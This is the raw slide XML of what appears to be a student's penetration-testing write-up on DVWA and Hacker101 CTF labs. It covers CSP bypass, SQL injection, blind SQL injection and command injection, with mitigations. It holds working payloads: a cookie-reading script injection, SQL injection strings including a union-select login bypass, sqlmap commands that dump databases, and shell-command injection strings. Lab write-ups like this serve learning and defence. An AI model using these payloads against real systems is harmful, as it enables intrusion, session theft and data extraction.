            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> alert(document.cookie);</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>&lt;script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA="&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Content-Security-Policy: script-src 'self';</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If you can change the php source code, comment out all code except the part that echos "alert(document.cookie)". This can be used to steal sessions. The impossible level does not allow this.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CSP ByPass</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;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impossible CSP ByPass level of DVWA, the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> JSONP call has its callback function hardcoded and the CSP policy is locked down to only allow external scripts. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Portswigger - The following directive will only allow scripts to be loaded from the same origin as the page itself: script-src 'self'</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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Google Shape;364;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Injections allow attackers to interfere with the queries an application makes to its database which allows the attacker to view data they are not intended to retrieve. This includes any data stored in the database and the attacker can modify and delete any of the data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If there is a crash when a quote (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>',"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) or comment (#, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) added to the user input, the application may be vulnerable to an SQL injection.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An attacker may use this to gain access to an account by using {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>' or 1=1--} or they can use it to get all entries from a database because this bit of code is always true. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365" name="Google Shape;365;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7045438" y="436100"/>
            <a:ext cx="1571625" cy="590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of SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Google Shape;371;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Extract sensitive information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enumerate the authentication details of users registered on a website</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Delete data or drop tables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Inject further malicious code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Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;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
              <a:t>Check for errors/SQLi with</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>// Error</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>'# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>// Removes error</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>' or 1=1# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>// Returns all values for query</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lang="en"/>
              <a:t>1 or 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>// returns all values for query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 This makes the password x for when you try to log in with admin with the password 'x'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>username=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>admin' union select 'x' as password;#</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>password=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>x</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CTF hint contained: uwsgi-nginx-flask-docker image </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://1a232c644bde80b9ad4af76be42849f1.ctf.hacker101.com/fetch?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>-1 union select 'main.py'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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Google Shape;383;p5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Remove any quotes from the input. Implementing the htmlspecialchars() PHP function is to escape characters by encoding characters such as &amp;, ", ', &lt;, and &gt; that would be used to create SQL queries.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If the input is supposed to only contain integers only, make sure that the characters that are input are only numeric.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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if(is_numeric( $id )) {</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>        $id = intval ($id);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The use :id in the query.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Blind SQL Injection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;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Blind SQL injection is SQL injection, except the HTTP responses don’t contain the results of the relevant SQL query or any database errors that a normal SQL injection would. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In the next examples I use a tool called sqlmap to display the table data for blind SQL queries.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In one of the examples sqlmap finds a boolean-based blind and time-based blind injection.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="390" name="Google Shape;390;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="73628" l="0" r="0" t="11675"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6918850" y="617499"/>
            <a:ext cx="1913450" cy="2277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Sqlmap (a tool for blind SQL injections)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="392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python3 sqlmap.py https://1a232c644bde80b9ad4af76be42849f1.ctf.hacker101.com/fetch?id=1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>python3 sqlmap.py https://1a232c644bde80b9ad4af76be42849f1.ctf.hacker101.com/fetch?id=1 --dbs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>python3 sqlmap.py https://1a232c644bde80b9ad4af76be42849f1.ctf.hacker101.com/fetch?id=1 -D level5 --dump</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 This is the same like above but way faster and uses a burp suite request instead.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sqlmap -r '/home/kali/sqlmap/photo-gallery-test.txt'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sqlmap -r '/home/kali/sqlmap/photo-gallery-test.txt' --dbs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sqlmap -r '/home/kali/sqlmap/photo-gallery-test.txt' -D level5 --dump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use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>| tee &lt;output.file&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to save the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 Testing Guide</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Before I started any pentesting, I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>familiarized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> myself with the OWASP Testing Guide. For DVWA I used the 4.0 pdf. I later found the latest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>GitHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> project and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>testing guide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="Google Shape;95;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724550" y="0"/>
            <a:ext cx="4419450" cy="8176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sqlmap commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Google Shape;402;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100"/>
              <a:t>Shows the vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>python3 sqlmap.py -u "http://localhost:80/DVWA/vulnerabilities/sqli_blind/"  --data="id=2&amp;Submit=Submit" --cookie="PHPSESSID=rrop8vr2of95d1ofdid5oji2tu;security=impossible"  | tee dvwa_sqlmap_impossible.txt</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Shows the databases</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>python3 sqlmap.py -u "http://localhost:80/DVWA/vulnerabilities/sqli_blind/"  --data="id=2&amp;Submit=Submit" --cookie="PHPSESSID=rrop8vr2of95d1ofdid5oji2tu;security=impossible" --dbs | tee dvwa_sqlmap_impossible.txt</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Dumps the data for the database</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>python3 sqlmap.py -u "http://localhost:80/DVWA/vulnerabilities/sqli_blind/"  --data="id=2&amp;Submit=Submit" --cookie="PHPSESSID=rrop8vr2of95d1ofdid5oji2tu;security=impossible" -D dvwa --dump | tee dvwa_sqlmap_impossible.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1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Blind SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p6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Remove any quotes from the input. Implementing the htmlspecialchars() PHP function is to escape characters by encoding characters such as &amp;, ", ', &lt;, and &gt; that would be used to create SQL queries.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t>If the input is supposed to only contain integers only, make sure that the characters that are input are only numeric.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Eg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>if(is_numeric( $id )) {</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>        $id = intval ($id);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The use :id in the query.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Weak Session IDs</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p6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Hackers can put together scripts to enumerate through session IDs and check the HTTP response code. The script can run multiple times in parallel using a botnet. When a session ID is found, the attacker can use that session ID to gain access to another user’s session.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Examples are anything that is easy to guess such at iterable sessions IDs and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> IDs. Anything that can be predicted can be used to gain access to another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>user's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> session. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mitigation: That is why session IDs must be unique and completely random. They must not be predictable and difficult to enumerate.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Command Injection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420;p6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websites make use of command line calls to read files, send emails, and other operations. If a website transforms untrusted input into shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>commands they need to make sure they sanitise the input. Otherwise the attacker can craft a payload to execute whatever command they like. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For example, with an nslookup command, the user input {www.google.com &amp;&amp; echo helloworld} which would look like this in the terminal {nslookup www.google.com &amp;&amp; echo helloworld}.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In the next examples I will show how to get a bind shell.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 Injection Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Google Shape;426;p6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&lt;input&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>;ls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input&gt;&amp; ls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
